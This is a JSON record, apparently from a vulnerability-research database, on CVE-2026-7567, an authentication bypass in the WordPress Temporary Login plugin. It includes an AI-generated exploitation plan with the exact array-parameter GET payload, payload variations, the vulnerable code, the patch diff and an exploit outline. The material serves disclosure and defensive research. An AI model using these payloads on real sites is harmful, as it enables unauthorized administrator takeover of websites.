[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f7PGqyZ66PnMMwNONCqt1sdzGsAdVNycx0VmM6xVN9m8":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":28,"research_verified":29,"research_rounds_completed":30,"research_plan":31,"research_summary":32,"research_vulnerable_code":33,"research_fix_diff":34,"research_exploit_outline":35,"research_model_used":36,"research_started_at":37,"research_completed_at":38,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":29,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":29,"source_links":39},"CVE-2026-7567","temporary-login-authentication-bypass-to-account-takeover","Temporary Login \u003C= 1.0.0 - Authentication Bypass to Account Takeover","The Temporary Login plugin for WordPress is vulnerable to Authentication Bypass in versions up to and including 1.0.0. This is due to improper input validation in the maybe_login_temporary_user() function, which fails to verify that the 'temp-login-token' GET parameter is a scalar string before processing it. When the parameter is supplied as an array, PHP's empty() check is bypassed and sanitize_key() returns an empty string, which is then passed as the meta_value to get_users(). WordPress ignores an empty meta_value and returns all users matching the meta_key '_temporary_login_token', allowing authentication without a valid token. 
This makes it possible for unauthenticated attackers to authenticate as any active temporary login user by sending a single crafted GET request.","temporary-login",null,"\u003C=1.0.0","1.1.0","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Authentication Bypass Using an Alternate Path or Channel","2026-04-30 20:59:11","2026-05-01 09:26:06",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ff97c669b-86c1-4873-a050-76972f494099?source=api-prod",1,[22,23,24,25,26,27],"assets\u002Fadmin.asset.php","assets\u002Fadmin.js","core\u002Fadmin.php","core\u002Foptions.php","readme.txt","temporary-login.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-7567 - Temporary Login Authentication Bypass\n\n## 1. Vulnerability Summary\nThe **Temporary Login** plugin for WordPress (versions \u003C= 1.0.0) contains an authentication bypass vulnerability in the `maybe_login_temporary_user()` function. The vulnerability arises because the plugin fails to validate that the `temp-login-token` GET parameter is a scalar string before passing it to `sanitize_key()`. \n\nWhen an array is supplied (e.g., `temp-login-token[]=`), `sanitize_key()` returns an empty string. This empty string is then used in a `get_users()` query as the `meta_value` for the `_temporary_login_token` key. WordPress's `WP_User_Query` logic, when receiving an empty `meta_value`, may return all users possessing that `meta_key`. Since the plugin's temporary users are created with the `administrator` role by default, an unauthenticated attacker can authenticate as the first available temporary administrator by sending a crafted request.\n\n## 2. 
Attack Vector Analysis\n- **Endpoint**: Any WordPress page (the vulnerable function is hooked to `init`).\n- **Hook**: `add_action( 'init', [ __CLASS__, 'maybe_login_temporary_user' ] );` in `core\u002Fadmin.php`.\n- **Parameter**: `temp-login-token` (GET parameter).\n- **Payload**: `temp-login-token[]=randomvalue`\n- **Authentication**: Unauthenticated.\n- **Precondition**: At least one active (non-expired) temporary login user must exist in the database.\n\n## 3. Code Flow\n1. **Entry Point**: A request is made to any WordPress URL with `?temp-login-token[]=1`.\n2. **Hook Execution**: `TemporaryLogin\\Core\\Admin::maybe_login_temporary_user()` is triggered during `init`.\n3. **Input Validation Failure** (`core\u002Fadmin.php`):\n   ```php\n   if ( empty( $_GET['temp-login-token'] ) ) { \u002F\u002F Returns false because array is not empty\n       return;\n   }\n   $token = sanitize_key( $_GET['temp-login-token'] ); \u002F\u002F Returns \"\" (empty string) for array input\n   ```\n4. **Data Retrieval** (`core\u002Foptions.php` via `Admin::maybe_login_temporary_user`):\n   ```php\n   $user = Options::get_user_by_token( $token ); \u002F\u002F $token is \"\"\n   ```\n5. **Vulnerable Query** (`core\u002Foptions.php`):\n   ```php\n   public static function get_user_by_token( $token ) {\n       $users = get_users( [\n           'meta_key' => '_temporary_login_token',\n           'meta_value' => $token, \u002F\u002F meta_value is \"\"\n       ] );\n       \u002F\u002F ... returns the first user matching the meta_key\n   }\n   ```\n6. **Authentication Bypass** (`core\u002Fadmin.php`):\n   ```php\n   if ( ! $user || Options::is_user_expired( $user->ID ) ) { ... }\n   static::process_login( $user ); \u002F\u002F Authenticates the attacker as $user[0]\n   ```\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability **does not require a nonce**. 
The `maybe_login_temporary_user()` function is designed to handle auto-logins from external email links where nonces are not applicable. It relies solely on the `temp-login-token` for \"security.\"\n\n## 5. Exploitation Strategy\n1. **Create Target Data**: Use WP-CLI to generate a temporary user so the bypass has a target to find.\n2. **Trigger Bypass**: Send a GET request to the WordPress homepage with the array payload.\n3. **Capture Cookies**: The response should include `Set-Cookie` headers for the authenticated session.\n4. **Access Admin Area**: Use the captured cookies to request `\u002Fwp-admin\u002F` and verify administrator access.\n\n### HTTP Request (Payload)\n```http\nGET \u002F?temp-login-token[]=exploit HTTP\u002F1.1\nHost: localhost\n```\n\n## 6. Test Data Setup\n1. **Activate Plugin**: Ensure `temporary-login` is installed and active.\n2. **Create Temporary User**:\n   - Since we need to test the bypass, we must simulate a state where a temporary user exists.\n   - Run the following WP-CLI command to invoke the plugin's internal user generation:\n     ```bash\n     wp eval 'TemporaryLogin\\Core\\Options::generate_temporary_user();'\n     ```\n3. **Verify User Creation**:\n   ```bash\n   wp user list --role=administrator\n   ```\n   (Look for a user with the prefix `temp-login-`)\n\n## 7. Expected Results\n- The initial GET request to `\u002F?temp-login-token[]=exploit` should return a `302 Found` redirecting to `\u002Fwp-admin\u002F`.\n- The response headers should contain authentication cookies (`wordpress_logged_in_*`).\n- Following the redirect with the provided cookies should grant full access to the WordPress dashboard.\n\n## 8. Verification Steps\n1. **Check Logged-in User**:\n   After the HTTP request, use the capture session to check the current user's identity:\n   ```bash\n   # This is done via the PoC script checking the dashboard content or user profile\n   ```\n2. 
**Database State Check**:\n   Confirm that the temporary user is indeed the one that was logged in:\n   ```bash\n   wp user get \u003Cusername_from_cookies> --field=roles\n   wp user get \u003Cusername_from_cookies> --field=display_name\n   ```\n\n## 9. Alternative Approaches\n- **Action Parameter**: If the direct login fails, try appending `&temp-login-action=info` to see if the plugin leaks the expiration data of the first temporary user, confirming the `get_users()` query is indeed returning a user object.\n- **Multiple Users**: If the first temporary user in the database is expired, the code will redirect to `home_url()`. In a real-world scenario, the attacker would hope for at least one active user. For testing, ensure the generated user is not expired (the default is 7 days).\n- **Payload Variations**:\n  - `?temp-login-token[0]=`\n  - `?temp-login-token[a]=b`\n  - `?temp-login-token[]=` (empty element)","The Temporary Login plugin for WordPress (\u003C= 1.0.0) is vulnerable to an authentication bypass that allows unauthenticated attackers to log in as a temporary administrator. 
The vulnerability exists because the plugin fails to ensure the 'temp-login-token' parameter is a string, allowing an array input to result in an empty string token that matches any valid temporary user in the database.","\u002F\u002F core\u002Fadmin.php line 153\npublic static function maybe_login_temporary_user() {\n\tif ( empty( $_GET['temp-login-token'] ) ) {\n\t\treturn;\n\t}\n\n\t$token = sanitize_key( $_GET['temp-login-token'] );\n\n\t$user = Options::get_user_by_token( $token );\n\n---\n\n\u002F\u002F core\u002Foptions.php line 147\npublic static function get_user_by_token( $token ) {\n\t$users = get_users( [\n\t\t'meta_key' => '_temporary_login_token',\n\t\t'meta_value' => $token,\n\t] );\n\n\tif ( empty( $users ) ) {\n\t\treturn null;\n\t}\n\n\treturn $users[0];\n}","--- core\u002Fadmin.php\n+++ core\u002Fadmin.php\n@@ -153,7 +153,7 @@\n \tpublic static function maybe_login_temporary_user() {\n-\t\tif ( empty( $_GET['temp-login-token'] ) ) {\n+\t\tif ( empty( $_GET['temp-login-token'] ) || ! is_string( $_GET['temp-login-token'] ) ) {\n \t\t\treturn;\n \t\t}","The exploit targets the `maybe_login_temporary_user` function hooked to WordPress `init`. An attacker sends a GET request to any page on the site with the parameter `temp-login-token[]` set to any value. Because the input is an array, `empty()` returns false, but `sanitize_key()` returns an empty string. The subsequent `get_users` query in `Options::get_user_by_token` searches for a user where `_temporary_login_token` is an empty string; WordPress's `WP_User_Query` logic treats an empty string `meta_value` as a broad match for any user possessing the `meta_key`. 
If at least one active temporary administrator exists, the query returns that user, and the plugin proceeds to call `wp_set_auth_cookie()`, logging the attacker in as that administrator.","gemini-3-flash-preview","2026-05-04 17:40:38","2026-05-04 17:40:56",{"type":40,"vulnerable_version":41,"fixed_version":11,"vulnerable_browse":42,"vulnerable_zip":43,"fixed_browse":44,"fixed_zip":45,"all_tags":46},"plugin","1.0.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ftemporary-login\u002Ftags\u002F1.0.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ftemporary-login.1.0.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ftemporary-login\u002Ftags\u002F1.1.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ftemporary-login.1.1.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ftemporary-login\u002Ftags"]